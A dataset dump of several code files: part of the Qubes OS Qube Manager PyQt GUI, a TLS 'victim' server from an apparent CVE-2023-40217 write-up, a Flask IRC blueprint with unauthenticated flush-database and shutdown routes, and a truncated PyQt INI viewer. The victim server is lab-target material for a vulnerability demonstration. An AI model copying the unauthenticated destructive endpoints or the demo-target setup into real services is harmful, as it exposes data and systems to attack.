self.context_menu.addAction(self.action_run_command_in_vm)\n self.context_menu.addAction(self.action_resumevm)\n self.context_menu.addAction(self.action_startvm_tools_install)\n self.context_menu.addAction(self.action_pausevm)\n self.context_menu.addAction(self.action_shutdownvm)\n self.context_menu.addAction(self.action_restartvm)\n self.context_menu.addAction(self.action_killvm)\n self.context_menu.addSeparator()\n\n self.context_menu.addAction(self.action_clonevm)\n self.context_menu.addAction(self.action_removevm)\n self.context_menu.addSeparator()\n\n self.context_menu.addMenu(self.logs_menu)\n self.context_menu.addSeparator()\n\n self.tools_context_menu = QtGui.QMenu(self)\n self.tools_context_menu.addAction(self.action_toolbar)\n self.tools_context_menu.addAction(self.action_menubar)\n\n self.connect(\n self.table.horizontalHeader(),\n QtCore.SIGNAL(\"sortIndicatorChanged(int, Qt::SortOrder)\"),\n self.sort_indicator_changed)\n self.connect(self.table,\n QtCore.SIGNAL(\"customContextMenuRequested(const QPoint&)\"),\n self.open_context_menu)\n self.connect(self.menubar,\n QtCore.SIGNAL(\"customContextMenuRequested(const QPoint&)\"),\n lambda pos: self.open_tools_context_menu(self.menubar,\n pos))\n self.connect(self.toolbar,\n QtCore.SIGNAL(\"customContextMenuRequested(const QPoint&)\"),\n lambda pos: self.open_tools_context_menu(self.toolbar,\n pos))\n self.connect(self.logs_menu, QtCore.SIGNAL(\"triggered(QAction *)\"),\n self.show_log)\n\n self.connect(self.searchbox,\n QtCore.SIGNAL(\"textChanged(const QString&)\"),\n self.do_search)\n\n self.table.setContentsMargins(0, 0, 0, 0)\n self.centralwidget.layout().setContentsMargins(0, 0, 0, 0)\n self.layout().setContentsMargins(0, 0, 0, 0)\n\n self.connect(self.action_menubar, QtCore.SIGNAL(\"toggled(bool)\"),\n self.showhide_menubar)\n self.connect(self.action_toolbar, QtCore.SIGNAL(\"toggled(bool)\"),\n self.showhide_toolbar)\n\n self.load_manager_settings()\n\n self.fill_table()\n\n self.counter = 0\n self.update_size_on_disk = False\n self.shutdown_monitor = {}\n\n def load_manager_settings(self):\n # visible columns\n self.visible_columns_count = 0\n for col in self.columns_indices:\n col_no = self.columns_indices[col]\n visible = self.manager_settings.value(\n 'columns/%s' % col,\n defaultValue=\"true\")\n self.columns_actions[col_no].setChecked(visible == \"true\")\n self.visible_columns_count += 1\n\n self.sort_by_column = str(\n self.manager_settings.value(\"view/sort_column\",\n defaultValue=self.sort_by_column))\n self.sort_order = QtCore.Qt.SortOrder(\n self.manager_settings.value(\"view/sort_order\",\n defaultValue=self.sort_order))\n self.table.sortItems(self.columns_indices[self.sort_by_column],\n self.sort_order)\n if not self.manager_settings.value(\"view/menubar_visible\",\n defaultValue=True):\n self.action_menubar.setChecked(False)\n if not self.manager_settings.value(\"view/toolbar_visible\",\n defaultValue=True):\n self.action_toolbar.setChecked(False)\n self.settings_loaded = True\n\n def get_vms_list(self):\n return [vm for vm in self.qubes_app.domains]\n\n def update_single_row(self, vm):\n # this fuction should be used to update a row that already exists\n # to add a row, one needs to use the update_table function - the\n # whole table needs to be redrawn (and sorted)\n if vm in self.qubes_app.domains:\n self.vms_in_table[vm.qid].update()\n else:\n self.update_table()\n\n def fill_table(self):\n # save current selection\n row_index = self.table.currentRow()\n selected_qid = -1\n if row_index != -1:\n vm_item = self.table.item(row_index, self.columns_indices[\"Name\"])\n if vm_item:\n selected_qid = vm_item.qid\n\n self.table.setSortingEnabled(False)\n self.table.clearContents()\n vms_list = self.get_vms_list()\n\n vms_in_table = {}\n\n row_no = 0\n for vm in vms_list:\n vm_row = VmRowInTable(vm, row_no, self.table)\n vms_in_table[vm.qid] = vm_row\n\n row_no += 1\n\n self.table.setRowCount(row_no)\n self.vms_list = vms_list\n self.vms_in_table = vms_in_table\n if selected_qid in vms_in_table.keys():\n self.table.setCurrentItem(\n self.vms_in_table[selected_qid].name_widget)\n self.table.setSortingEnabled(True)\n\n self.showhide_vms()\n\n def showhide_vms(self):\n if not self.search:\n for row_no in range(self.table.rowCount()):\n self.table.setRowHidden(row_no, False)\n else:\n for row_no in range(self.table.rowCount()):\n widget = self.table.cellWidget(row_no,\n self.columns_indices[\"State\"])\n show = (self.search in widget.vm.name)\n self.table.setRowHidden(row_no, not show)\n\n @QtCore.pyqtSlot(str)\n def do_search(self, search):\n self.search = str(search)\n self.showhide_vms()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_search_triggered')\n def action_search_triggered(self):\n self.searchbox.setFocus()\n\n def update_table(self):\n\n self.fill_table()\n # TODO: instead of manually refreshing the entire table, use dbus events\n\n # reapply sorting\n if self.sort_by_column:\n self.table.sortByColumn(self.columns_indices[self.sort_by_column])\n\n self.table_selection_changed()\n\n # noinspection PyPep8Naming\n def sort_indicator_changed(self, column, order):\n self.sort_by_column = [name for name in self.columns_indices if\n self.columns_indices[name] == column][0]\n self.sort_order = order\n if self.settings_loaded:\n self.manager_settings.setValue('view/sort_column',\n self.sort_by_column)\n self.manager_settings.setValue('view/sort_order', self.sort_order)\n self.manager_settings.sync()\n\n def table_selection_changed(self):\n\n vm = self.get_selected_vm()\n\n if vm is not None and vm in self.qubes_app.domains:\n\n # TODO: add boot from device to menu and add windows tools there\n # Update available actions:\n self.action_settings.setEnabled(vm.klass != 'AdminVM')\n self.action_removevm.setEnabled(\n vm.klass != 'AdminVM' and not vm.is_running())\n self.action_clonevm.setEnabled(vm.klass != 'AdminVM')\n self.action_resumevm.setEnabled(\n not vm.is_running() or vm.get_power_state() == \"Paused\")\n self.action_pausevm.setEnabled(\n vm.is_running() and vm.get_power_state() != \"Paused\"\n and vm.klass != 'AdminVM')\n self.action_shutdownvm.setEnabled(\n vm.is_running() and vm.get_power_state() != \"Paused\"\n and vm.klass != 'AdminVM')\n self.action_restartvm.setEnabled(\n vm.is_running() and vm.get_power_state() != \"Paused\"\n and vm.klass != 'AdminVM'\n and (vm.klass != 'DispVM' or not vm.auto_cleanup))\n self.action_killvm.setEnabled(\n (vm.get_power_state() == \"Paused\" or vm.is_running())\n and vm.klass != 'AdminVM')\n\n self.action_appmenus.setEnabled(\n vm.klass != 'AdminVM' and vm.klass != 'DispVM'\n and not vm.features.get('internal', False))\n self.action_editfwrules.setEnabled(vm.klass != 'AdminVM')\n self.action_updatevm.setEnabled(getattr(vm, 'updateable', False)\n or vm.qid == 0)\n self.action_run_command_in_vm.setEnabled(\n not vm.get_power_state() == \"Paused\" and vm.qid != 0)\n self.action_set_keyboard_layout.setEnabled(\n vm.qid != 0 and\n vm.get_power_state() != \"Paused\" and vm.is_running())\n\n self.update_single_row(vm)\n else:\n self.action_settings.setEnabled(False)\n self.action_removevm.setEnabled(False)\n self.action_clonevm.setEnabled(False)\n self.action_resumevm.setEnabled(False)\n self.action_pausevm.setEnabled(False)\n self.action_shutdownvm.setEnabled(False)\n self.action_restartvm.setEnabled(False)\n self.action_killvm.setEnabled(False)\n self.action_appmenus.setEnabled(False)\n self.action_editfwrules.setEnabled(False)\n self.action_updatevm.setEnabled(False)\n self.action_run_command_in_vm.setEnabled(False)\n self.action_set_keyboard_layout.setEnabled(False)\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_createvm_triggered')\n def action_createvm_triggered(self): # pylint: disable=no-self-use\n subprocess.check_call('qubes-vm-create')\n\n def get_selected_vm(self):\n # vm selection relies on the VmInfo widget's value used\n # for sorting by VM name\n row_index = self.table.currentRow()\n if row_index != -1:\n vm_item = self.table.item(row_index, self.columns_indices[\"Name\"])\n # here is possible race with update_table timer so check\n # if really got the item\n if vm_item is None:\n return None\n qid = vm_item.qid\n assert self.vms_in_table[qid] is not None\n vm = self.vms_in_table[qid].vm\n return vm\n else:\n return None\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_removevm_triggered')\n def action_removevm_triggered(self):\n\n vm = self.get_selected_vm()\n\n if vm.klass == 'TemplateVM':\n dependent_vms = 0\n for single_vm in self.qubes_app.domains:\n if getattr(single_vm, 'template', None) == vm:\n dependent_vms += 1\n if dependent_vms > 0:\n QtGui.QMessageBox.warning(\n None, self.tr(\"Warning!\"),\n self.tr(\"This Template Qube cannot be removed, \"\n \"because there is at least one Qube that is based \"\n \"on it.<br><small>If you want to remove this \"\n \"Template Qube and all the Qubes based on it, you \"\n \"should first remove each individual Qube that \"\n \"uses this template.</small>\"))\n return\n\n (requested_name, ok) = QtGui.QInputDialog.getText(\n None, self.tr(\"Qube Removal Confirmation\"),\n self.tr(\"Are you sure you want to remove the Qube <b>'{0}'</b>\"\n \"?<br> All data on this Qube's private storage will be \"\n \"lost!<br><br>Type the name of the Qube (<b>{1}</b>) below \"\n \"to confirm:\").format(vm.name, vm.name))\n\n if not ok:\n # user clicked cancel\n return\n\n elif requested_name != vm.name:\n # name did not match\n QtGui.QMessageBox.warning(\n None,\n self.tr(\"Qube removal confirmation failed\"),\n self.tr(\n \"Entered name did not match! Not removing \"\n \"{0}.\").format(vm.name))\n return\n\n else:\n # remove the VM\n t_monitor = thread_monitor.ThreadMonitor()\n thread = threading.Thread(target=self.do_remove_vm,\n args=(vm, self.qubes_app, t_monitor))\n thread.daemon = True\n thread.start()\n\n progress = QtGui.QProgressDialog(\n self.tr(\n \"Removing Qube: <b>{0}</b>...\").format(vm.name), \"\", 0, 0)\n progress.setCancelButton(None)\n progress.setModal(True)\n progress.show()\n\n while not t_monitor.is_finished():\n self.qt_app.processEvents()\n time.sleep(0.1)\n\n progress.hide()\n\n if t_monitor.success:\n pass\n else:\n QtGui.QMessageBox.warning(None, self.tr(\"Error removing Qube!\"),\n self.tr(\"ERROR: {0}\").format(\n t_monitor.error_msg))\n\n self.update_table()\n\n @staticmethod\n def do_remove_vm(vm, qubes_app, t_monitor):\n try:\n del qubes_app.domains[vm.name]\n except exc.QubesException as ex:\n t_monitor.set_error_msg(str(ex))\n\n t_monitor.set_finished()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_clonevm_triggered')\n def action_clonevm_triggered(self):\n vm = self.get_selected_vm()\n\n name_number = 1\n name_format = vm.name + '-clone-%d'\n while name_format % name_number in self.qubes_app.domains.keys():\n name_number += 1\n\n (clone_name, ok) = QtGui.QInputDialog.getText(\n self, self.tr('Qubes clone Qube'),\n self.tr('Enter name for Qube <b>{}</b> clone:').format(vm.name),\n text=(name_format % name_number))\n if not ok or clone_name == \"\":\n return\n\n t_monitor = thread_monitor.ThreadMonitor()\n thread = threading.Thread(target=self.do_clone_vm,\n args=(vm, self.qubes_app,\n clone_name, t_monitor))\n thread.daemon = True\n thread.start()\n\n progress = QtGui.QProgressDialog(\n self.tr(\"Cloning Qube <b>{0}</b> to <b>{1}</b>...\").format(\n vm.name, clone_name), \"\", 0, 0)\n progress.setCancelButton(None)\n progress.setModal(True)\n progress.show()\n\n while not t_monitor.is_finished():\n self.qt_app.processEvents()\n time.sleep(0.2)\n\n progress.hide()\n\n if not t_monitor.success:\n QtGui.QMessageBox.warning(\n None,\n self.tr(\"Error while cloning Qube\"),\n self.tr(\"Exception while cloning:<br>{0}\").format(\n t_monitor.error_msg))\n\n self.update_table()\n\n @staticmethod\n def do_clone_vm(src_vm, qubes_app, dst_name, t_monitor):\n dst_vm = None\n try:\n dst_vm = qubes_app.clone_vm(src_vm, dst_name)\n except exc.QubesException as ex:\n t_monitor.set_error_msg(str(ex))\n if dst_vm:\n pass\n t_monitor.set_finished()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_resumevm_triggered')\n def action_resumevm_triggered(self):\n vm = self.get_selected_vm()\n\n if vm.get_power_state() in [\"Paused\", \"Suspended\"]:\n try:\n vm.unpause()\n except exc.QubesException as ex:\n QtGui.QMessageBox.warning(\n None, self.tr(\"Error unpausing Qube!\"),\n self.tr(\"ERROR: {0}\").format(ex))\n return\n\n self.start_vm(vm)\n self.update_single_row(vm)\n\n def start_vm(self, vm):\n if vm.is_running():\n return\n t_monitor = thread_monitor.ThreadMonitor()\n thread = threading.Thread(target=self.do_start_vm,\n args=(vm, t_monitor))\n thread.daemon = True\n thread.start()\n\n while not t_monitor.is_finished():\n self.qt_app.processEvents()\n time.sleep(0.1)\n\n if not t_monitor.success:\n QtGui.QMessageBox.warning(\n None,\n self.tr(\"Error starting Qube!\"),\n self.tr(\"ERROR: {0}\").format(t_monitor.error_msg))\n\n self.update_single_row(vm)\n\n @staticmethod\n def do_start_vm(vm, t_monitor):\n try:\n vm.start()\n except exc.QubesException as ex:\n t_monitor.set_error_msg(str(ex))\n t_monitor.set_finished()\n return\n\n t_monitor.set_finished()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_startvm_tools_install_triggered')\n # TODO: replace with boot from device\n def action_startvm_tools_install_triggered(self):\n # pylint: disable=invalid-name\n pass\n\n @QtCore.pyqtSlot(name='on_action_pausevm_triggered')\n def action_pausevm_triggered(self):\n vm = self.get_selected_vm()\n assert vm.is_running()\n try:\n vm.pause()\n self.update_single_row(vm)\n except exc.QubesException as ex:\n QtGui.QMessageBox.warning(\n None,\n self.tr(\"Error pausing Qube!\"),\n self.tr(\"ERROR: {0}\").format(ex))\n return\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_shutdownvm_triggered')\n def action_shutdownvm_triggered(self):\n vm = self.get_selected_vm()\n assert vm.is_running()\n\n reply = QtGui.QMessageBox.question(\n None, self.tr(\"Qube Shutdown Confirmation\"),\n self.tr(\"Are you sure you want to power down the Qube\"\n \" <b>'{0}'</b>?<br><small>This will shutdown all the \"\n \"running applications within this Qube.</small>\").format(\n vm.name), QtGui.QMessageBox.Yes | QtGui.QMessageBox.Cancel)\n\n self.qt_app.processEvents()\n\n if reply == QtGui.QMessageBox.Yes:\n self.shutdown_vm(vm)\n\n self.update_single_row(vm)\n\n def shutdown_vm(self, vm, shutdown_time=vm_shutdown_timeout,\n check_time=vm_restart_check_timeout, and_restart=False):\n try:\n vm.shutdown()\n except exc.QubesException as ex:\n QtGui.QMessageBox.warning(\n None,\n self.tr(\"Error shutting down Qube!\"),\n self.tr(\"ERROR: {0}\").format(ex))\n return\n\n self.shutdown_monitor[vm.qid] = VmShutdownMonitor(vm, shutdown_time,\n check_time,\n and_restart, self)\n # noinspection PyCallByClass,PyTypeChecker\n QtCore.QTimer.singleShot(check_time, self.shutdown_monitor[\n vm.qid].check_if_vm_has_shutdown)\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_restartvm_triggered')\n def action_restartvm_triggered(self):\n vm = self.get_selected_vm()\n assert vm.is_running()\n\n reply = QtGui.QMessageBox.question(\n None, self.tr(\"Qube Restart Confirmation\"),\n self.tr(\"Are you sure you want to restart the Qube <b>'{0}'</b>?\"\n \"<br><small>This will shutdown all the running \"\n \"applications within this Qube.</small>\").format(vm.name),\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.Cancel)\n\n self.qt_app.processEvents()\n\n if reply == QtGui.QMessageBox.Yes:\n self.shutdown_vm(vm, and_restart=True)\n\n self.update_single_row(vm)\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_killvm_triggered')\n def action_killvm_triggered(self):\n vm = self.get_selected_vm()\n assert vm.is_running() or vm.is_paused()\n\n reply = QtGui.QMessageBox.question(\n None, self.tr(\"Qube Kill Confirmation\"),\n self.tr(\"Are you sure you want to kill the Qube <b>'{0}'</b>?<br>\"\n \"<small>This will end <b>(not shutdown!)</b> all the \"\n \"running applications within this Qube.</small>\").format(\n vm.name),\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.Cancel,\n QtGui.QMessageBox.Cancel)\n\n self.qt_app.processEvents()\n\n if reply == QtGui.QMessageBox.Yes:\n try:\n vm.kill()\n except exc.QubesException as ex:\n QtGui.QMessageBox.critical(\n None, self.tr(\"Error while killing Qube!\"),\n self.tr(\n \"<b>An exception ocurred while killing {0}.</b><br>\"\n \"ERROR: {1}\").format(vm.name, ex))\n return\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_settings_triggered')\n def action_settings_triggered(self):\n vm = self.get_selected_vm()\n if vm:\n settings_window = settings.VMSettingsWindow(\n vm, self.qt_app, \"basic\")\n settings_window.exec_()\n self.update_single_row(vm)\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_appmenus_triggered')\n def action_appmenus_triggered(self):\n vm = self.get_selected_vm()\n if vm:\n settings_window = settings.VMSettingsWindow(\n vm, self.qt_app, \"applications\")\n settings_window.exec_()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_refresh_list_triggered')\n def action_refresh_list_triggered(self):\n self.qubes_app.domains.clear_cache()\n self.update_table()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_updatevm_triggered')\n def action_updatevm_triggered(self):\n vm = self.get_selected_vm()\n\n if not vm.is_running():\n reply = QtGui.QMessageBox.question(\n None, self.tr(\"Qube Update Confirmation\"),\n self.tr(\n \"<b>{0}</b><br>The Qube has to be running to be updated.\"\n \"<br>Do you want to start it?<br>\").format(vm.name),\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.Cancel)\n if reply != QtGui.QMessageBox.Yes:\n return\n\n self.qt_app.processEvents()\n\n t_monitor = thread_monitor.ThreadMonitor()\n thread = threading.Thread(target=self.do_update_vm,\n args=(vm, t_monitor))\n thread.daemon = True\n thread.start()\n\n progress = QtGui.QProgressDialog(\n self.tr(\n \"<b>{0}</b><br>Please wait for the updater to \"\n \"launch...\").format(vm.name), \"\", 0, 0)\n progress.setCancelButton(None)\n progress.setModal(True)\n progress.show()\n\n while not t_monitor.is_finished():\n self.qt_app.processEvents()\n time.sleep(0.2)\n\n progress.hide()\n\n if vm.qid != 0:\n if not t_monitor.success:\n QtGui.QMessageBox.warning(\n None,\n self.tr(\"Error on Qube update!\"),\n self.tr(\"ERROR: {0}\").format(t_monitor.error_msg))\n\n self.update_single_row(vm)\n\n @staticmethod\n def do_update_vm(vm, t_monitor):\n try:\n if vm.qid == 0:\n subprocess.check_call(\n [\"/usr/bin/qubes-dom0-update\", \"--clean\", \"--gui\"])\n else:\n if not vm.is_running():\n vm.start()\n vm.run_service(\"qubes.InstallUpdatesGUI\",\n user=\"root\", wait=False)\n except (ChildProcessError, exc.QubesException) as ex:\n t_monitor.set_error_msg(str(ex))\n t_monitor.set_finished()\n return\n t_monitor.set_finished()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_run_command_in_vm_triggered')\n def action_run_command_in_vm_triggered(self):\n # pylint: disable=invalid-name\n vm = self.get_selected_vm()\n\n (command_to_run, ok) = QtGui.QInputDialog.getText(\n self, self.tr('Qubes command entry'),\n self.tr('Run command in <b>{}</b>:').format(vm.name))\n if not ok or command_to_run == \"\":\n return\n t_monitor = thread_monitor.ThreadMonitor()\n thread = threading.Thread(target=self.do_run_command_in_vm, args=(\n vm, command_to_run, t_monitor))\n thread.daemon = True\n thread.start()\n\n while not t_monitor.is_finished():\n self.qt_app.processEvents()\n time.sleep(0.2)\n\n if not t_monitor.success:\n QtGui.QMessageBox.warning(\n None, self.tr(\"Error while running command\"),\n self.tr(\"Exception while running command:<br>{0}\").format(\n t_monitor.error_msg))\n\n @staticmethod\n def do_run_command_in_vm(vm, command_to_run, t_monitor):\n try:\n vm.run(command_to_run)\n except (ChildProcessError, exc.QubesException) as ex:\n t_monitor.set_error_msg(str(ex))\n t_monitor.set_finished()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_set_keyboard_layout_triggered')\n def action_set_keyboard_layout_triggered(self):\n # pylint: disable=invalid-name\n vm = self.get_selected_vm()\n vm.run('qubes-change-keyboard-layout')\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_editfwrules_triggered')\n def action_editfwrules_triggered(self):\n vm = self.get_selected_vm()\n settings_window = settings.VMSettingsWindow(vm, self.qt_app, \"firewall\")\n settings_window.exec_()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_global_settings_triggered')\n def action_global_settings_triggered(self): # pylint: disable=invalid-name\n global_settings_window = global_settings.GlobalSettingsWindow(\n self.qt_app,\n self.qubes_app)\n global_settings_window.exec_()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_show_network_triggered')\n def action_show_network_triggered(self):\n pass\n # TODO: revive for 4.1\n # network_notes_dialog = NetworkNotesDialog()\n # network_notes_dialog.exec_()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_restore_triggered')\n def action_restore_triggered(self):\n restore_window = restore.RestoreVMsWindow(self.qt_app, self.qubes_app)\n restore_window.exec_()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_backup_triggered')\n def action_backup_triggered(self):\n backup_window = backup.BackupVMsWindow(self.qt_app, self.qubes_app)\n backup_window.exec_()\n\n def showhide_menubar(self, checked):\n self.menubar.setVisible(checked)\n if not checked:\n self.context_menu.addAction(self.action_menubar)\n else:\n self.context_menu.removeAction(self.action_menubar)\n if self.settings_loaded:\n self.manager_settings.setValue('view/menubar_visible', checked)\n self.manager_settings.sync()\n\n def showhide_toolbar(self, checked):\n self.toolbar.setVisible(checked)\n if not checked:\n self.context_menu.addAction(self.action_toolbar)\n else:\n self.context_menu.removeAction(self.action_toolbar)\n if self.settings_loaded:\n self.manager_settings.setValue('view/toolbar_visible', checked)\n self.manager_settings.sync()\n\n def showhide_column(self, col_num, show):\n self.table.setColumnHidden(col_num, not show)\n\n val = 1 if show else -1\n self.visible_columns_count += val\n\n if self.visible_columns_count == 1:\n # disable hiding the last one\n for col in self.columns_actions:\n if self.columns_actions[col].isChecked():\n self.columns_actions[col].setEnabled(False)\n break\n elif self.visible_columns_count == 2 and val == 1:\n # enable hiding previously disabled column\n for col in self.columns_actions:\n if not self.columns_actions[col].isEnabled():\n self.columns_actions[col].setEnabled(True)\n break\n\n if self.settings_loaded:\n col_name = [name for name in self.columns_indices if\n self.columns_indices[name] == col_num][0]\n self.manager_settings.setValue('columns/%s' % col_name, show)\n self.manager_settings.sync()\n\n def on_action_vm_type_toggled(self, checked):\n self.showhide_column(self.columns_indices['Type'], checked)\n\n def on_action_label_toggled(self, checked):\n self.showhide_column(self.columns_indices['Label'], checked)\n\n def on_action_name_toggled(self, checked):\n self.showhide_column(self.columns_indices['Name'], checked)\n\n def on_action_state_toggled(self, checked):\n self.showhide_column(self.columns_indices['State'], checked)\n\n def on_action_internal_toggled(self, checked):\n self.showhide_column(self.columns_indices['Internal'], checked)\n\n def on_action_ip_toggled(self, checked):\n self.showhide_column(self.columns_indices['IP'], checked)\n\n def on_action_backups_toggled(self, checked):\n self.showhide_column(self.columns_indices['Backups'], checked)\n\n def on_action_last_backup_toggled(self, checked):\n self.showhide_column(self.columns_indices['Last backup'], checked)\n\n def on_action_template_toggled(self, checked):\n self.showhide_column(self.columns_indices['Template'], checked)\n\n def on_action_netvm_toggled(self, checked):\n self.showhide_column(self.columns_indices['NetVM'], checked)\n\n def on_action_size_on_disk_toggled(self, checked):\n self.showhide_column(self.columns_indices['Size'], checked)\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_about_qubes_triggered')\n def action_about_qubes_triggered(self): # pylint: disable=no-self-use\n about = AboutDialog()\n about.exec_()\n\n def createPopupMenu(self): # pylint: disable=invalid-name\n menu = QtGui.QMenu()\n menu.addAction(self.action_toolbar)\n menu.addAction(self.action_menubar)\n return menu\n\n def open_tools_context_menu(self, widget, point):\n self.tools_context_menu.exec_(widget.mapToGlobal(point))\n\n @QtCore.pyqtSlot('const QPoint&')\n def open_context_menu(self, point):\n vm = self.get_selected_vm()\n\n # logs menu\n self.logs_menu.clear()\n\n if vm.qid == 0:\n logfiles = [\"/var/log/xen/console/hypervisor.log\"]\n else:\n logfiles = [\n \"/var/log/xen/console/guest-\" + vm.name + \".log\",\n \"/var/log/xen/console/guest-\" + vm.name + \"-dm.log\",\n \"/var/log/qubes/guid.\" + vm.name + \".log\",\n \"/var/log/qubes/qrexec.\" + vm.name + \".log\",\n ]\n\n menu_empty = True\n for logfile in logfiles:\n if os.path.exists(logfile):\n action = self.logs_menu.addAction(QtGui.QIcon(\":/log.png\"),\n logfile)\n action.setData(logfile)\n menu_empty = False\n\n self.logs_menu.setEnabled(not menu_empty)\n self.context_menu.exec_(self.table.mapToGlobal(point))\n\n @QtCore.pyqtSlot('QAction *')\n def show_log(self, action):\n log = str(action.data())\n log_dlg = log_dialog.LogDialog(self.qt_app, log)\n log_dlg.exec_()\n\n\n# Bases on the original code by:\n# Copyright (c) 2002-2007 Pascal Varet <p.varet@gmail.com>\n\ndef handle_exception(exc_type, exc_value, exc_traceback):\n\n filename, line, dummy, dummy = traceback.extract_tb(exc_traceback).pop()\n filename = os.path.basename(filename)\n error = \"%s: %s\" % (exc_type.__name__, exc_value)\n\n strace = \"\"\n stacktrace = traceback.extract_tb(exc_traceback)\n while stacktrace:\n (filename, line, func, txt) = stacktrace.pop()\n strace += \"----\\n\"\n strace += \"line: %s\\n\" % txt\n strace += \"func: %s\\n\" % func\n strace += \"line no.: %d\\n\" % line\n strace += \"file: %s\\n\" % filename\n\n msg_box = QtGui.QMessageBox()\n msg_box.setDetailedText(strace)\n msg_box.setIcon(QtGui.QMessageBox.Critical)\n msg_box.setWindowTitle(\"Houston, we have a problem...\")\n msg_box.setText(\"Whoops. A critical error has occured. \"\n \"This is most likely a bug in Qubes Manager.<br><br>\"\n \"<b><i>%s</i></b>\" % error +\n \"<br/>at line <b>%d</b><br/>of file %s.<br/><br/>\"\n % (line, filename))\n\n msg_box.exec_()\n\n\ndef main():\n qt_app = QtGui.QApplication(sys.argv)\n qt_app.setOrganizationName(\"The Qubes Project\")\n qt_app.setOrganizationDomain(\"http://qubes-os.org\")\n qt_app.setApplicationName(\"Qube Manager\")\n qt_app.setWindowIcon(QtGui.QIcon.fromTheme(\"qubes-manager\"))\n\n sys.excepthook = handle_exception\n\n qubes_app = Qubes()\n\n manager_window = VmManagerWindow(qubes_app, qt_app)\n\n manager_window.show()\n manager_window.update_table()\n qt_app.exec_()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"trgr/qubes-manager","sub_path":"qubesmanager/qube_manager.py","file_name":"qube_manager.py","file_ext":"py","file_size_in_byte":44550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"15297577657","text":"import socket\nimport ssl\n\n# Listen for TCP connections\nlistener = socket.socket()\nlistener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nlistener.bind((\"127.0.0.1\", 12345))\nlistener.listen(5)\nconn, address = listener.accept()\n\n# Create a TLS context that checks the client certificate\nctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)\nctx.verify_mode = ssl.CERT_REQUIRED\nctx.load_verify_locations(cafile=\"server.crt\")\nctx.load_cert_chain(certfile=\"server.crt\", keyfile=\"server.key\")\n\n# Wrap the TCP connection with TLS\ntls_socket = ctx.wrap_socket(conn, server_side=True)\n\n# Receive data from the authenticated and secure TLS connection\nprint(tls_socket.recv(4096))\n","repo_name":"aapooksman/writeups","sub_path":"CVE-2023-40217/python-ssl-server-victim.py","file_name":"python-ssl-server-victim.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"37209475598","text":"from flask import Blueprint, request, jsonify\nfrom redis_client import redis_client\n\n\nirc = Blueprint('irc', __name__)\n\n\n@irc.route('/part/<channel>', methods=['GET'])\ndef part(channel):\n redis_client.hset('channels', channel, 0)\n return f'LEFT {channel}'\n\n\n@irc.route('/channels', methods=['GET'])\ndef channels():\n print(\"REDIS - Channels\")\n print(redis_client.hgetall('channels'))\n return ''\n\n\n@irc.route('/deleteall')\ndef delete_all():\n redis_client.flushdb()\n return redis_client.hgetall('channels')\n\n\n@irc.route('/shutdown')\ndef shutdown():\n redis_client.delete('channels')\n func = request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n return jsonify({})\n","repo_name":"chasezimmy/irc-reader","sub_path":"irc/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"8631709148","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport configparser\nfrom PyQt5 import (QtCore as qtc, QtWidgets as qtw)\nfrom PyQt5.QtCore import Qt\n\n\nclass TableModel(qtc.QAbstractTableModel):\n def __init__(self, data):\n super(TableModel, self).__init__()\n self._data = data\n self.sections = data.sections()\n\n self.selected_section = self.sections[0]\n self.loadData()\n\n def loadData(self):\n\n self.selected_data = [(key, value) for key, value in\n self._data[self.selected_section].items()]\n\n self.collen = 2\n self.rowlen = len(self._data[self.selected_section])\n\n def data(self, index, role):\n if role == Qt.DisplayRole:\n # .row() indexes into the outer list,\n # .column() indexes into the (key, value) tuples\n return self.selected_data[index.row()][index.column()]\n\n def rowCount(self, index):\n # The length of the outer list.\n return len(self.selected_data)\n\n def columnCount(self, index):\n # The following takes the first sub-list, and returns\n # the length (only works if all rows are an equal length)\n return len(self.selected_data[0])\n\n\nclass IniTable(qtw.QTableView):\n\n def __init__(self, data, *args, **kwargs):\n super(IniTable, self).__init__(*args, **kwargs)\n self.model = TableModel(data)\n self.setModel(self.model)\n self.horizontalHeader().setSectionResizeMode(qtw.QHeaderView.Stretch)\n\n\nclass IniView(qtw.QWidget):\n\n def __init__(self, data, *args, **kwargs):\n super(IniView, self).__init__(*args, **kwargs)\n\n self._data = data\n\n self.table = IniTable(data)\n\n self.list = qtw.QListWidget()\n self.list.addItems(self._data.sections())\n 